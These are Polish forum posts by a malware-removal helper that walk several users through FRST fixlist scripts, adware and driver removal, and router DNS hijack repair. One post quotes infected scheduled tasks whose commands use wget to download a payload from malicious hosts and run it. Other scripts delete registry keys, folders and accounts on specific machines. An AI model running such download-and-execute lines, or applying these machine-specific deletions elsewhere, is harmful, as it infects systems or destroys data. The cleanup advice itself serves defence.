picasso

Czyli po najechaniu myszką (a nie z kliku) na to pierwsze poprawne Google nie pokazuje się opcja "Ustaw jako domyślną"? Poproszę o dane do ręcznej analizy. Otwórz Notatnik i wklej w nim: CMD: md C:\Users\Milosz\Desktop\GP CMD: xcopy /e C:\Windows\system32\GroupPolicy C:\Users\Milosz\Desktop\GP Zip: C:\Users\Milosz\AppData\Local\Google\Chrome\User Data\Profile 1\Secure Preferences;C:\Users\Milosz\AppData\Local\Google\Chrome\User Data\Web Data;C:\Users\Milosz\Desktop\GP;C:\Windows\SysWOW64\GroupPolicy Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Na Pulpicie powstanie plik Upload.zip. Shostuj go na jakimś zewnętrznym serwisie i podaj link do paczki.

Ale przecież mówiłam, że najpierw musisz ustawić normalną wyszukiwarkę Google jako domyślną (czyli tę pierwszą pozycję) i dopiero po tym będzie można skasować to "Custom search". To normalne, że Chrome nie pozwala usunąć domyślnej wyszukiwarki. Druga sprawa, gdzie widzisz napis "o tym ustawieniu decyduje administrator"? Ja tego nie widzę na podanym zrzucie ekranu...

Jeśli chodzi o "Custom search", po prostu spróbuj tego: Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > ustaw jako domyślną normalną wyszukiwarkę Google, następnie skasuj z listy wszystkie inne pozycje.

Spróbuj po prostu zresetować router poprzez przycisk zasilania.

Skoro ustawienia są OK, to czy nie jest to po prostu stara "historia"?

Pokaż na obrazku gdzie to widzisz. Wszystko wykonane i nie widać już żadnych szkodników. Drobna poprawka. Otwórz Notatnik i wklej w nim: Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\AdwCleaner Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu. Przedstaw wynikowy fixlog.txt. Nowe skany FRST nie są już potrzebne.

To nie jest dobry pomysł. Zapomniałam napisać, ta łata KB3172605 wymaga by przed nią zainstalować KB3020369. Jeśli to nic nie wniesie do sprawy (lub łatę tę już posiadasz), to: Spróbuj w Panelu sterowania w konfiguracji Windows Update zaznaczyć opcję "Nie wyszukuj aktualizacji" + restart systemu. Po restarcie podejmij się próby ręcznej instalacji łaty. Gdy to się uda, przywróć wyszukiwanie aktualizacji, zainstaluj wszystko co znalezione. - Tak. - To jest komponent HitmanPro.Alert, a nie standardowego skanera HitmanPro, na liście zainstalowanych brak tej aplikacji. Tylko dwa klucze zostały. Jeśli jest problem z ich usunięciem, możesz zastosować skrypt fixlist.txt o treści: DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\eventlog\Kaspersky Event Log DeleteKey: HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AppId_Catalog\122F9800-20668A9F

GMER nic nowego nie wnosi do sprawy. Podane wcześniej instrukcje nadal aktualne.

Podana łata KB3102810 stara (z 2015), tu raczej należy sprawdzić czy jest KB3172605:

Zadania nie usunęły się, choć są obecnie martwe. Zrób nowy skrypt fixlist.txt do FRST o następującej treści: Task: {2AB6CBD3-6F5D-428A-8D2B-36804562C06C} - System32\Tasks\{F6DB9864-A15B-45A5-970B-B702F9D74B30} => D:\Program Files (x86)\Steam\SteamApps\common\Mashed\launch.exe Task: {A5C8B19E-F098-4CE7-B62E-70D5601F83C0} - System32\Tasks\{35CC3810-D684-4CCF-BB9F-72F867C178CF} => D:\Program Files (x86)\Steam\SteamApps\common\Mashed\MASHED.exe Przetestuj czy tymczasowe wyłączenie usługi (włącznie z zakończeniem procesu) obniża obciążenie zasobów. Jeśli wyjdzie na jaw, że to WU, to raczej tu nic nie da się zrobić. Czy masz zainstalowane wszystkie aktualizacje? Na wszelki wypadek zacytuję jeszcze z innego tematu:

Naprawa błyskawiczna, gdyż tylko drobne rzeczy były do przetworzenia. Podany skrypt uruchomiłeś niepotrzebnie aż dwa razy (w logu odczyt Run:3), skrypt jest jednorazowego użytku i nie przetworzy ponownie tego samego. Wszystko wygląda na wykonane, AdwCleaner był już wcześniej uruchamiany, więc nie sądzę by teraz coś wykrył. Na koniec zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Proszę umieszczaj raporty FRST w postaci osobnych załączników TXT, nie pakuj logów do ZIP/RAR, to utrudnia mi analizę. Logi przeniosłam do załączników. GMER na razie opuść. W systemie są aktywne obiekty adware (wpisy "Plesege") oraz jest ustawione dziwne proxy kierujące na "Google" (ale tu nie wykluczam, że to wynik Twoich nieudolnych prób naprawy, przypuszczalnie tam był inny adres niż Google). Działania do przeprowadzenia: 1. Odinstaluj stare wersje (zagrożenie infekcjami szyfrującymi dane) Adobe Flash Player 20 ActiveX, Adobe Flash Player 21 NPAPI oraz dziwną aplikację NotepadPlusPlusApp. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 SherdewardcoosentConfiguration; C:\Program Files (x86)\Plesege\Ckaletionbuilder.dll [297472 2016-09-17] () [brak podpisu cyfrowego] Task: {CF874292-B528-429C-BA23-51D8A8987252} - System32\Tasks\Sherdewardcoosent Configuration => C:\Program Files (x86)\Plesege\herutain.exe [2016-09-17] (CHENGDU YIWO Tech Development Co., Ltd) CustomCLSID: HKU\S-1-5-21-410550195-1196533998-280330643-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\recovery.dll => Brak pliku FirewallRules: [{12B87416-B8B2-483F-8D08-FF7AD9D9DBF9}] => (Allow) C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe FirewallRules: [{EE324EE0-399B-4FF1-98D0-EAC1D9C392A3}] => (Allow) C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com HKU\S-1-5-21-410550195-1196533998-280330643-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com HKU\S-1-5-21-410550195-1196533998-280330643-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com SearchScopes: HKLM -> DefaultScope - brak wartości DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\NotepadPlusPlusApp DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Microsoft Antimalware DeleteKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{48ABBDFD-CF3A-4084-8413-00FFAB22E561} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\GridinSoft Anti-Malware C:\Program Files\Plumbytes Software C:\Program Files (x86)\g4udis99 C:\Program Files (x86)\t469aix6 C:\Program Files (x86)\Plesege C:\ProgramData\AVAST Software C:\ProgramData\Avg C:\ProgramData\Avira C:\ProgramData\jcfppn C:\ProgramData\GridinSoft C:\ProgramData\Mozilla C:\Users\Milosz\AppData\Local\{23371A81-D2B0-45BB-AE7E-11AB62B46B72} C:\Users\Milosz\AppData\Local\Medosh C:\Users\Milosz\AppData\Local\Mozilla C:\Users\Milosz\AppData\Roaming\Mozilla C:\Users\Milosz\AppData\Roaming\NotepadPlusPlusApp C:\Windows\Joberphlusisp RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale już bez Shortcut. Dołącz też plik fixlog.txt. Potwierdź ustąpienie problemu.

Temat przenoszę do działu Windows. Brak oznak infekcji. vs. Czy problem z Windows Defender nadal występuje? Obecność "COM Surrogate" nie świadczy o niczym: KLIK. I u Ciebie na pewno nie ma infekcji odpalającej szkodliwą instancję dllhost. PS. W spoilerze skrypt kosmetyczny usuwający puste wpisy (głównie po aktualizacji z Windows 7 do Windows 10).

1. Ostał się po deinstalacji tylko jeden obiekt w usługach. Otwórz Notatnik i wklej w nim: U2 Thorn; no ImagePath Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). A elementy gry w katalogach Dokumenty i Pobrane dokasuj ręcznie. 2. Przez SHIFF+DEL (omija Kosz) skasuj FRST i jego logi z folderu C:\Users\boogie\Desktop\antivir\skanery na forum. Następnie zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. To wszystko.

Wejdź ponownie do ustawień DHCP i sprawdź czy infekcja nie wróciła w ustawieniach DNS... Poza tym, zapomniałam podkreślić, że dane logowania do routera też należy zmienić, w przeciwnym wypadku przy domyślnym loginie infekcja po prostu będzie wracać. Wykonałeś to?

Prawie wszystko pomyślnie odinstalowane, ostał się jednak aktywny sterownik Baidu. Doczyszczanie po deinstalacjach: 1. Kolejne deinstalacje: - Odinstaluj jeszcze te starocie: K-Lite Codec Pack 6.2.0 (Basic), LAME v3.99.3 (for Windows), Windows Media Player Firefox Plugin, Xvid Video Codec. Jeśli coś będzie później potrzebne, to ewentualnie doinstalujemy nowe wersje. - Uruchom Program Install and Uninstall Troubleshooter i za jego pomocą usuń ukryty odpadek po Adobe Shockwave swMSM. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: R0 Bhbase; C:\Windows\System32\drivers\Bhbase.sys [46440 2015-03-31] (Baidu, Inc.) U5 AppMgmt; C:\Windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 AdobeUpdateService; C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [X] S2 BASSVC; "C:\Program Files\Baidu Security\MoboMarket\1.2.8.4379\bassvc.exe" -svc [X] S3 BprotectEx; \??\C:\Windows\System32\drivers\BprotectEx.sys [X] S3 PCFApiUtil; \??\C:\Program Files\PC Faster\5.1.0.0\PCFApiUtil.sys [X] Task: {0E9F1DD4-4F87-4A26-BA7B-9623333CCA2B} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files\Norton Internet Security\Engine\21.1.0.18\SymErr.exe Task: {13B8C185-BEEC-4E21-94C6-27B02F42D1A5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {251513BC-20DE-4CEB-A01B-F251D4928651} - System32\Tasks\{2FE4EAE7-B719-4DBC-9AD1-47EBD5FAEF8B} => Chrome.exe hxxp://ui.skype.com/ui/0/6.16.0.105/pl/abandoninstall?page=tsProgressBar Task: {25311AD4-9B42-44C7-9FB8-90BE07111418} - System32\Tasks\{485030A6-13D3-4BAB-BB08-56748BC146E5} => pcalua.exe -a "C:\Program Files\Real\RealPlayer\Update\r1puninst.exe" -c RealNetworks|RealPlayer|15.0 Task: {2A7BE995-3CB8-4CAC-BD35-122E9D077802} - System32\Tasks\{27869052-90F0-4837-BA38-6AFE9830166B} => pcalua.exe -a C:\Users\User\Downloads\podanie.exe -d C:\Users\User\Downloads Task: {3C7956F2-28CC-40A7-9452-8D6481806BBD} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Duplicaterecord.js" Task: {4A0CD994-8408-4A16-88C6-F337583268A4} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files\Norton Internet Security\Engine\21.1.0.18\SymErr.exe Task: {52D05AFA-BB7C-4513-BC08-AB7F2F7ACCD1} - System32\Tasks\{3AD1090E-8F7E-4519-BFC3-0355FEACFD01} => Chrome.exe hxxp://ui.skype.com/ui/0/6.16.0.105/pl/abandoninstall?page=tsProgressBar Task: {53D5E446-7AA3-4261-9BD9-3A3DF43C0908} - System32\Tasks\{BE95B6E7-88F3-43CE-B5F2-0FA8DDA46A0E} => pcalua.exe -a D:\GRY\HP2\HP2.exe -d D:\GRY\HP2 Task: {B4A20ABC-E0C7-4170-B8A3-53310DF82919} - System32\Tasks\{561301EB-306C-476D-BB00-F205F5119DBC} => pcalua.exe -a F:\SimsPS_inst.exe -d F:\ Task: {D852C01B-1944-4AE0-82EB-8F79297C7E25} - System32\Tasks\{F737C845-BFFD-42B5-AADE-3E56D788FE78} => Chrome.exe hxxp://ui.skype.com/ui/0/6.22.81.104/pl/abandoninstall?source=lightinstaller&page=tsMain Task: {E6C1CFE2-4746-4E28-A58F-397995476F12} - System32\Tasks\{9F93EB9D-6D4C-4D7F-ADF3-BFF4BEA7756B} => pcalua.exe -a "C:\Program Files\Deluxe Ski Jump 4\Setup.exe" -d "C:\Program Files\Deluxe Ski Jump 4" Task: {F0EF25E8-338F-481C-AC23-C24552FDAD72} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Internet Security\Engine\21.1.0.18\WSCStub.exe Task: {F842110C-FCA0-429F-BCD7-34E007A18753} - System32\Tasks\{3B0AED1C-E912-4D4A-BC5D-7309489BBC11} => pcalua.exe -a D:\download\Last.fm-1.5.4.27091.exe -d D:\download Task: {FFAF5642-0684-4A67-B080-C2BBFCCB8E20} - System32\Tasks\{FA920636-A0FC-4C54-A287-8CBAF5695453} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2 University\Sims2EP1_loader.exe" -d "C:\Program Files\EA GAMES\The Sims 2 University" HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" HKLM\...\Run: [Adobe Creative Cloud] => "C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true HKLM\...\Run: [DLLSuite2016] => C:\Program Files\DLL Suite\DLLSuite.exe HKU\S-1-5-21-1894515312-3285578680-510463183-1000\...\Run: [Xvid] => C:\Program Files\Xvid\CheckUpdate.exe [8192 2011-01-17] () HKU\S-1-5-21-1894515312-3285578680-510463183-1000\...\Run: [EA Core] => "C:\Program Files\Electronic Arts\EADM\Core.exe" -silent HKU\S-1-5-21-1894515312-3285578680-510463183-1000\...\Run: [uTorrent] => "D:\cx7 trial\utorrent\uTorrent.exe" /MINIMIZED CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-1894515312-3285578680-510463183-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-1894515312-3285578680-510463183-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-1894515312-3285578680-510463183-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.wp.pl/?dp=20160817 BHO: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll => Brak pliku DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab FF Plugin: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [brak pliku] FF Plugin: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [brak pliku] FF Plugin HKU\S-1-5-21-1894515312-3285578680-510463183-1000: @unity3d.com/UnityPlayer,version=1.0 -> Unity\WebPlayer\loader\npUnity3D32.dll [brak pliku] FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main C:\Program Files\GUT6E29.tmp C:\Program Files\Baidu Security C:\Program Files\GUM898A.tmp C:\Program Files\GUMB99E.tmp C:\Program Files\Java C:\Program Files\McAfee C:\Program Files\Real C:\Program Files\QuickTime C:\Program Files\Common Files\McAfee C:\ProgramData\Duplicaterecord.js C:\ProgramData\Baidu C:\ProgramData\Baidu Security C:\ProgramData\McAfee C:\ProgramData\Temp C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hao123桌面版 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp3 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader C:\Users\User\AppData\Local\Adobe * C:\Users\User\AppData\Roaming\Preferencje * C:\Users\User\AppData\Roaming\Baidu C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\360安全浏览器 C:\Users\User\Documents\Corel\Próbki Corel PHOTO-PAINT X6\target.lnk C:\Users\User\Favorites\常用 C:\Users\User\Favorites\GG dysk.lnk C:\Users\User\Favorites\Links\1şĹµę-ÍřÉĎł¬ĘĐ1şĹµęŁ¬ĘˇÁ¦ĘˇÇ®ĘˇĘ±Ľä.url C:\Users\User\Favorites\Links\´óÖÚµăĆŔÍřÍĹąş.url C:\Users\User\Favorites\Links\ËŐÄţŇ׹ş,ËŐÄţŇ׹şÍřÉĎÉĚłÇ.url C:\Users\User\Favorites\Links\ĚÔ±¦ÍřĚŘÂôƵµŔ - ĂżČյͼŰÉĚĆ·ÇŔąşÖĐŁˇ.url C:\Users\User\Favorites\Links\ľ©¶«ÍřÉĎÉĚłÇ-×ŰşĎÍřąşĘ×ѡ.url C:\Users\User\Favorites\Links\ŃÇÂíŃ·-ÍřÉĎąşÎďÉĚłÇ.url C:\Users\Public\Documents\Baidu C:\Users\Public\Documents\Baidu Security C:\Users\wangzhisong C:\Windows\system32\Adobe C:\Windows\system32\Drivers\Bhbase.sys C:\Windows\system32\Tasks\AVAST Software C:\Windows\system32\Tasks\Norton Internet Security EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść w folderze z którego uruchamiasz FRST. Przejdź w tryb awaryjny Windows. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu, opuść tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonym Addition ale bez Shortcut. Dołącz też plik fixlog.txt. Wyliczone przez Ciebie strony, na których nie ma problemu, domyślnie ładują odtwarzacz HTML5 a nie Flash. W kwestii reszty (o ile na polskich stronach chodzi o Flash, bo niekoniecznie materiały mogą być w tym formacie), to sprawdź czy coś pomoże ustawienie tej opcji w Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > Ustawienia treści > Wtyczki > Uruchom całą treść wtyczki. Po rekonfiguracji przeładuj Chrome.

Fix FRST nie miał być powtarzany, to jest skrypt jednorazowego użytku i przestaje być aktualny po użyciu (nie przetworzy ponownie tego co już usunął). Natomiast akcja z routerem poprawnie wykonana, w świeżym logu FRST widać, że DhcpNameServer zostało pomyślnie zaktualizowane z routera. Wszystko zrobione, kończymy: Zastosuj DelFix, wyczyść foldery Przywracania systemu, dodatkowo zaktualizuj programy Adobe AIR + Adobe Flash Player 22 NPAPI. Wszystko tu: KLIK.

Fix FRST pomyślnie wykonany. Wykryte zostały sterowniki (*}Gw64.sys od SourceApp. Ich rzeczywiście nie ma w systemie, w raporcie FRST zero śladu po nich. Proces svchost.exe to host dla wielu usług, występuje wielokrotnie zgodnie z podziałem usług na grupy. Zdefiniuj o którym svchost tu mowa. Prawoklik na proces > Przejdź do usług > wypisz podświetlone. Jeśli będzie wśród usług Windows Update, to jest przypuszczalny delikwent. Mashed jest także na liście zainstalowanych programów. Skoro gra nie działa, odinstaluj ją. Następnie zrób nowy log FRST Addition.txt (główny log zbędny). Jeśli on wykaże że zadania się nie usunęły samodzielnie, dokończę je skryptem FRST.

DHCP > DHCP Settings > skonfiguruj Primary i Secondary DNS: Dodatkowo trzeba też zamknąć zdalny dostęp: Security > Remote Management > pola Remote Management IP Address ustaw na 0.0.0.0

Działania końcowe: 1. W Dzienniku zdarzeń drobny błąd WMI. Skoryguj na podstawie wytycznych Microsoftu: KLIK. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Zaktualizuj Internet Explorer do wersji IE11. Obecnie stoi stara niewspierana wersja IE8. To wszystko.

Skutki w logu: Tcpip\Parameters: [DhcpNameServer] 5.39.220.125 8.8.8.8 Tcpip\..\Interfaces\{f6207f7f-9703-4893-9945-d3a972c6df22}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{f6207f7f-9703-4893-9945-d3a972c6df22}: [DhcpNameServer] 5.39.220.125 8.8.8.8 To nie są te serwery DNS o które tu chodziło, dlatego nie podawałam tych instrukcji. Zedytowałeś serwery DNS Windows (NameServer) a nie routera (DhcpNameServer). Owszem, one "przebijają" te z routera, co nie zmienia faktu, że router jest nadal zainfekowany i cokolwiek wepniesz w sieć pod jego kontrolą (np. laptop, telefon, etc.) zostanie natychmiast zainfekowane. Bezpośrednia edycja rejestru tu odpada, DhcpNameServer jest aktualizowane z routera i wartość nie utrzyma się. Podaj z jakim modelem routera mamy do czynienia.

Skoryguję co zostało tu powiedziane. Infekcja tu była, załączono ją w skrypcie "kosmetycznym": Task: C:\WINDOWS\Tasks\SYSTEM.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/grogle.in/dat.bmp?data=1q1vWhzPgW;Raxco.PerfectDisk.v13.0.821.exe;1420484096 & start cmd /R dat.bmp <==== UWAGA Task: C:\WINDOWS\Tasks\SYSTEMDOWN.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/sdshdb.nl/index.php?data=Z6dtuSqiU9;up;1421768315 & start cmd /R dat.bmp Task: C:\WINDOWS\Tasks\SYSTEMUP.job => C:\Documents and Settings\All Users\Dane aplikacji & ping 1.1.1.1 -n 200 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp:/iashdb.in/index.php?data=k5XKOx8fDI;up;1421768299 & start cmd /R dat.bmp Ale to nie ZeroAccess, który jest martwy od lat. - Jakie "wirusy" w rejestrze? I po czym poznajesz, że pendrive jest "zainfekowany"? - Na czym polega niemożność deinstalacji programu "Apple Software Update"? - Tak, w komputerze jest kilku użytkowników i jest to normalny układ. Wszystkie konta z wyjątkiem osobiście przez Ciebie założonego (Dawid) oraz wprowadzonego przez instalację .NET Framework 1.1 (ASPNET) są wbudowane w każdy system XP. To od .NET można usunąć, jest zbędne. ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-839522115-1303643608-1417001333-500 - Administrator - Enabled) ASPNET (S-1-5-21-839522115-1303643608-1417001333-1004 - Limited - Enabled) Dawid (S-1-5-21-839522115-1303643608-1417001333-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Dawid Gość (S-1-5-21-839522115-1303643608-1417001333-501 - Limited - Disabled) Pomocnik (S-1-5-21-839522115-1303643608-1417001333-1000 - Limited - Enabled) SUPPORT_388945a0 (S-1-5-21-839522115-1303643608-1417001333-1002 - Limited - Disabled) - A foldery "crypto" są poprawne i nie próbuj ich usuwać, bo uszkodzisz system certyfikatów systemu: C:\Documents and Settings\[Folder konta]\Dane aplikacji\Microsoft\Crypto Tak, bo jessika przetworzyła w skrypcie sterownik G Data filtrujący klawiaturę, ale nie zdejmując filtra z klawiatury (to należało zrobić przed próbą usuwania sterownika). KBFlt = Keyboard Filter: R3 GDKBFlt; C:\WINDOWS\system32\drivers\GDKBFlt32.sys [20096 2015-04-10] (G Data Software AG) Otwórz Notatnik i wklej w nim: Reg: reg add HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318} /v UpperFilters /t REG_MULTI_SZ /d kbdclass /f CMD: net user ASPNET /delete S3 IDriverT; "C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe" [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = SearchScopes: HKLM -> DefaultScope - brak wartości FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: (Microsoft .NET Framework Assistant) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2011-06-28] [Brak podpisu cyfrowego] Reboot: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw plik. A klawiatura powinna zacząć działać.

Jest multum sposobów wykorzystywanych przez infekcje, np. ograniczenia IPSec, modyfikacja pliku Hosts, proxy, instrukcje wbudowane w określony proces lub moduł (może być uruchomiony na multum sposobów).

AdwCleaner wykrył sporo szczątków adware w rejestrze. Skasuj wszystko za pomocą AdwCleaner. UCGuard usunięty, więc program powinien wykonać zadanie. Na wszelki wypadek sprawdź też czy Hitman nadal coś widzi.

Zadałam tryb awaryjny (a nie awaryjny z obsługą sieci) właśnie ze względu na sterownik UCGuard od niepożądanej instalacji UCBrowser. To on blokował procesy usuwania. Skrypt FRST pomyślnie wykonany. Poprawki: 1. Nowy profil Google Chrome założony, a już zanieczyszczony przez niepożądane przekierowania Wize Search. Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Wize. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > ustaw Google jako domyślną, po tym skasuj z listy powiązaną wyszukiwarkę Wize. 2. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\TDSSKiller_Quarantine RemoveDirectory: C:\Users\Przemek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData RemoveDirectory: C:\Users\Przemek\AppData\Local\Google\Chrome\User Data\Default Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu. Przedstaw wynikowy fixlog.txt. 3. Uruchom AdwCleaner ponownie i sprawdź czy coś jeszcze wykrywa.